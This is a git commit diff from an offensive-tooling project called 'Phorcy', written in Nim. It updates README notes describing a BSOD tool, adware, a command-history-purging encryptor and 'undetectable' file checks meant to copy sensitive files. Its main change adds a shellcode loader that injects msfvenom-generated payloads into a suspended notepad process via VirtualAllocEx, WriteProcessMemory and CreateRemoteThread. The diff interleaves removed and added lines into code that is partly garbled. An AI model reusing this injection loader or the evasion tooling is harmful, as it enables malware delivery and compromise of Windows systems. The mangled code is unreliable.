[S] worked on nim. added changes to NIM docs.

2023-11-29 13:37:44 +01:00
parent e774316a70
commit 59512d7b64
6 changed files with 135 additions and 74 deletions
--- a/README.md
+++ b/README.md
@@ -3,13 +3,13 @@ Phorcy
 **Warning**
 > This Tool is for educational purposes only.
-
+Do not release.
 **Note**
-> Coding Languages: NIM; Python; Javascript.
+> Programming languages: NIM; C++, Python; Javascript.
-> Working Status: Unfinished
+> Status: Unfinished
 > Date finished: N/A
 > Title: Phorcy
 > Description: ...
-
+> Main developers: Synthetic; Cat ;Eline
-
+Contains numerous new tools in NIM (tested on v. 2.0.0 unless written otherwise) that implement very important features for a project like this.
-
+Last updated: 29th November 2023. Time: Morning in Europe.
--- a/elinethingz/README.md
+++ b/elinethingz/README.md
@@ -11,13 +11,9 @@ format:
 [seq[byte]](@[0x40,0x80]
 # mic_reg.nim
 [Broken]
 Checks if Windows OSD is enabled.
 # encfile.nim
-Has multiple functions to encrypt text and/or files (streams) with AES-256 derived using HMAC (SHA512_256). Max. password size 1024.
+Has multiple functions to encrypt text and/or files (streams) with AES-256 derived using HMAC (SHA512_256). Max. password size 1024 characters. Tested. Is suitable for sensitive data.
 Has a fingerprint/is detectable.
 # OFFENSIVEencfile.nim
 Very stripped-down encryption tool. Takes a stream and encrypts it (AES256 with HMAC SHA512_256). No max. password size.
@@ -29,3 +25,15 @@ Ideally a "packer"/loader for the main stage. Still very experimental and needs
 # bsod.nim
 Serves a BSOD to targets on Windows.
 # mic_reg.nim
 [Broken]
 Checks if Windows OSD is enabled.
 # checkfile.nim
 Basic program that uses direct syscalls to know if a file exists. Undetectable in normal conditions.
 Can be chained with other direct syscalls to copy sensitive files.
 # basicadware.nim
 Basic adware. At execution, shows a MessageBox with a title and content picked from a random (limited) pool.
--- a/elinethingz/security/packer/OFFENSIVEencfile.nim
+++ b/elinethingz/security/packer/OFFENSIVEencfile.nim
@@ -20,6 +20,8 @@
 # i.e ./offensiveencfile input output password
 # or maybe only get password interactively. hmm...
 # WARNING:
 #    This program purges command history on Windows. 
 import nimcrypto
 import std/sysrand
--- a/elinethingz/security/packer/packer.nim
+++ b/elinethingz/security/packer/packer.nim
@@ -7,70 +7,118 @@
 #   see https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/pop_bin.nim
 #   see https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/shellcode_bin.nim
 import os
 import system
 const
  MEM_COMMIT = 0x1000
  MEM_RESERVE = 0x2000
  PAGE_EXECUTE_READWRITE = 0x40
 type
    HANDLE* = int
    HWND* = HANDLE
    UINT* = int32
    LPCSTR* = cstring
 proc MessageBox*(hWnd: HWND, lpText: LPCSTR, lpCaption: LPCSTR, uType: UINT): int32 
  {.discardable, stdcall, dynlib: "user32", importc: "MessageBoxA".}
 MessageBox(0, "Hello, world !", "Nim is Powerful", 0)
-#    LPVOID VirtualAllocEx(
+import winim/lean
-#      [in]           HANDLE hProcess,
+import osproc
 #      [in, optional] LPVOID lpAddress, BUT IF NULL: automatically calculated
 #      [in]           SIZE_T dwSize,    is an int? size in bytes of memory region. "The size of the region of memory to allocate, in bytes."
 #      [in]           DWORD  flAllocationType,      see https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex
 #      [in]           DWORD  flProtect
 #    );
-# proc NimVirtualAllocEx*(hWnd: HWND, lpAddress: pointer, dwSize: LPCSTR, uType: UINT): int32 
+proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =
 #  {.discardable, stdcall, dynlib: "user32", importc: "VirtualAllocEx".}
    # Under the hood, the startProcess function from Nim's osproc module is calling CreateProcess() :D
    let tProcess = startProcess("notepad.exe") # notepad is in PATH. change with whatever the loader loaded.
    tProcess.suspend() # That's handy!
    defer: tProcess.close()
-# Declare the VirtualAlloc function from Windows API
+    echo "[*] Target Process: ", tProcess.processID
 proc VirtualAlloc*(addr: pointer void, size: csize_t, allocType: cuint, protect: cuint): pointer cvoid {.importwinapi: "VirtualAlloc".}
-# Declare a simple function that will be loaded into the allocated memory
+    let pHandle = OpenProcess(
-proc helloWorld() =
+        PROCESS_ALL_ACCESS, 
-  echo "Hello, World from allocated memory!"
+        false, 
        cast[DWORD](tProcess.processID)
    )
    defer: CloseHandle(pHandle)
-# Main procedure
+    echo "[*] pHandle: ", pHandle
 proc main(): int =
  # Calculate the size needed for the function
  let codeSize = procSize(helloWorld)
-  # Allocate memory using VirtualAlloc
+    let rPtr = VirtualAllocEx(
-  let allocatedMemory = VirtualAlloc(nil, codeSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
+        pHandle,
-  if allocatedMemory == nil:
+        NULL,
-    echo "Failed to allocate memory."
+        cast[SIZE_T](shellcode.len),
-    return 1  # Return an error code
+        MEM_COMMIT,
        PAGE_EXECUTE_READ_WRITE
    )
-  # Copy the function code to the allocated memory
+    var bytesWritten: SIZE_T
-  memcpy(allocatedMemory, addr(helloWorld), codeSize)
+    let wSuccess = WriteProcessMemory(
        pHandle, 
        rPtr,
        unsafeAddr shellcode,
        cast[SIZE_T](shellcode.len),
        addr bytesWritten
    )
-  # Cast the allocated memory to a function pointer
+    echo "[*] WriteProcessMemory: ", bool(wSuccess)
-  let funcPointer: proc() {.cdecl.} = cast[proc()](allocatedMemory)
+    echo "    \\-- bytes written: ", bytesWritten
    echo ""
-  # Execute the function in the allocated memory
+    let tHandle = CreateRemoteThread(
-  funcPointer()
+        pHandle, 
        NULL,
        0,
        cast[LPTHREAD_START_ROUTINE](rPtr),
        NULL, 
        0, 
        NULL
    )
    defer: CloseHandle(tHandle)
-  # Deallocate the memory (optional)
+    echo "[*] tHandle: ", tHandle
-  os.free(allocatedMemory)
+    echo "[+] Injected"
-  return 0  # Return 0 to indicate successful execution
+when defined(windows):
-when isMainModule:
+    # https://github.com/nim-lang/Nim/wiki/Consts-defined-by-the-compiler
-  main()
+    when defined(i386):
        # ./msfvenom -p windows/messagebox -f csharp, then modified for Nim arrays
        echo "[*] Running in x86 process"
        var shellcode: array[272, byte] = [
        byte 0xd9,0xeb,0x9b,0xd9,0x74,0x24,0xf4,0x31,0xd2,0xb2,0x77,0x31,0xc9,0x64,0x8b,
        0x71,0x30,0x8b,0x76,0x0c,0x8b,0x76,0x1c,0x8b,0x46,0x08,0x8b,0x7e,0x20,0x8b,
        0x36,0x38,0x4f,0x18,0x75,0xf3,0x59,0x01,0xd1,0xff,0xe1,0x60,0x8b,0x6c,0x24,
        0x24,0x8b,0x45,0x3c,0x8b,0x54,0x28,0x78,0x01,0xea,0x8b,0x4a,0x18,0x8b,0x5a,
        0x20,0x01,0xeb,0xe3,0x34,0x49,0x8b,0x34,0x8b,0x01,0xee,0x31,0xff,0x31,0xc0,
        0xfc,0xac,0x84,0xc0,0x74,0x07,0xc1,0xcf,0x0d,0x01,0xc7,0xeb,0xf4,0x3b,0x7c,
        0x24,0x28,0x75,0xe1,0x8b,0x5a,0x24,0x01,0xeb,0x66,0x8b,0x0c,0x4b,0x8b,0x5a,
        0x1c,0x01,0xeb,0x8b,0x04,0x8b,0x01,0xe8,0x89,0x44,0x24,0x1c,0x61,0xc3,0xb2,
        0x08,0x29,0xd4,0x89,0xe5,0x89,0xc2,0x68,0x8e,0x4e,0x0e,0xec,0x52,0xe8,0x9f,
        0xff,0xff,0xff,0x89,0x45,0x04,0xbb,0x7e,0xd8,0xe2,0x73,0x87,0x1c,0x24,0x52,
        0xe8,0x8e,0xff,0xff,0xff,0x89,0x45,0x08,0x68,0x6c,0x6c,0x20,0x41,0x68,0x33,
        0x32,0x2e,0x64,0x68,0x75,0x73,0x65,0x72,0x30,0xdb,0x88,0x5c,0x24,0x0a,0x89,
        0xe6,0x56,0xff,0x55,0x04,0x89,0xc2,0x50,0xbb,0xa8,0xa2,0x4d,0xbc,0x87,0x1c,
        0x24,0x52,0xe8,0x5f,0xff,0xff,0xff,0x68,0x6f,0x78,0x58,0x20,0x68,0x61,0x67,
        0x65,0x42,0x68,0x4d,0x65,0x73,0x73,0x31,0xdb,0x88,0x5c,0x24,0x0a,0x89,0xe3,
        0x68,0x58,0x20,0x20,0x20,0x68,0x4d,0x53,0x46,0x21,0x68,0x72,0x6f,0x6d,0x20,
        0x68,0x6f,0x2c,0x20,0x66,0x68,0x48,0x65,0x6c,0x6c,0x31,0xc9,0x88,0x4c,0x24,
        0x10,0x89,0xe1,0x31,0xd2,0x52,0x53,0x51,0x52,0xff,0xd0,0x31,0xc0,0x50,0xff,
        0x55,0x08]
    elif defined(amd64):
        # ./msfvenom -p windows/x64/messagebox -f csharp, then modified for Nim arrays
        echo "[*] Running in x64 process"
        var shellcode: array[295, byte] = [
        byte 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,
        0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
        0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
        0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
        0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,
        0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
        0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,
        0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,
        0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,
        0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
        0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
        0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,
        0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,
        0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
        0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,
        0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d,
        0x85,0x0f,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
        0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x65,0x6c,
        0x6c,0x6f,0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,
        0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00]
    # equivalent of 'if __name__ == '__main__' in python
    # when isMainModule:
    #    injectCreateRemoteThread(shellcode)
 injectCreateRemoteThread(shellcode)
--- a/elinethingz/utils/basicadware.nim
+++ b/elinethingz/utils/basicadware.nim
@@ -20,12 +20,14 @@ proc MessageBox*(hWnd: HWND, lpText: LPCSTR, lpCaption: LPCSTR, uType: UINT): in
 var
    titlemessages = @["Are you really free?",
-    "Window on the street, only mesmerized and pondering... Am I in the right?"]
+    "Poland!"]
-    captionmessages = @["From the river to the sea, Palestine will be free.",
+    captionmessages = @["From the river to the sea, Palestine will be free.", "We are the people of Heaven.",
-    "I believe and have faith in you."]
+    "War is peace. Slavery is freedom. Ignorance is strength.","Kurva mac!"] # todo: convert to cstrings
 randomize() # seeds randomizer 
 var 
    randomtitle:string = sample(titlemessages)
    randommessage:string = sample(captionmessages)
 var 
    randomtitle:cstring = sample(titlemessages).cstring
    randommessage:cstring = sample(captionmessages).cstring
 if isMainModule:
    MessageBox(0, randomtitle, randommessage, 0)
--- a/elinethingz/utils/checkfile.nim
+++ b/elinethingz/utils/checkfile.nim
@@ -4,8 +4,9 @@ proc fileExists(filename: cstring): bool =
  result = GetFileAttributesA(filename) != INVALID_FILE_ATTRIBUTES
 const
-    filename = "C:\\path\\to\\your\\file.txt"
+    filename = "C:\\path\\to\\your\\file.txt" # double-\ because it's an escape character.
 if fileExists(filename):
-  echo "The file exists!"
+  echo "File exists."
 else:
-  echo "The file does not exist."
+  echo "File does not exist."